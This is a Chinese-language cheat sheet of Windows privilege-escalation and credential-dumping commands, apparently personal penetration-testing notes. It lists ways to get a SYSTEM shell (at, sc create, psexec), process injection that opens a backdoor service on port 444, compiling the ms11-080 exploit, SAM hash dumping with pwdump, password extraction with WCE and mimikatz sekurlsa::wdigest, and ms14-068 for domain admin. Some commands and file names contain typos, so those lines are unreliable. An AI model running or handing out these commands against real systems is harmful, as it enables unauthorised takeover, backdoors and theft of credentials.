提权

 

 

at  8:00 /interactive cmd.exe    以system用户打开cmd.exe

taskkill explorer

taskadd explorer   以system用户打开桌面

 

sc create syscmd binpath = "cmd /k start" type = own type = interact

sc start syscmd

 

net user administrator /active:yes

 

 

 

tools

https://docs.microsoft.com/zh-cn/sysinternals/

sysinternals工具包　　　　Windows 大神： Mark Russinovich

psExec -i -s cmd.exe

 

pInjector.exe 注入工具

http://www.tarasco.org/security/Process_Injector

pInjector.exe -l

pinjector.exe -p 345 cmd.exe 444　　　　　　#注入进程345，开启后门服务444 以system用户运行cmd.exe

 

普通用户提权system (利用系统漏洞)

searchsploit ms11-080

searchspoit -m  187176.py

pyinstaller

pywin32

 

py 转 exe

python pyinstaller.py --onefile 18176.py

187176.exe -O xp   

 

PwdDown获取sam哈希值

pwdDump -x 127.0.01pwdDump 127.0.0.1

 

破解sam哈希在线网站

http://www.objectif-securite.ch/ophcrack.php

 

WCE从内存中获取口令工具

另外pwddump.exe 和 wce 在kali的 /usr/share/windows/binary/  /usr/share/wce目录下有

 

wce-universal.exe -h

WCE会读取已经登录的用户密码

 

俄罗斯人写的工具mimikatz_trunk 柠檬

也可以可以获取账号密码

::  两个冒号查看帮助

 

privilege ::   查看privilege帮助

 

privilege::debug   提权到debug权限

 

sekurlsa::

sekurlsa:: wdigest  获取在线用户密码

 

 

ms14-068　　普通用户提升至域管理员用户

dcpromo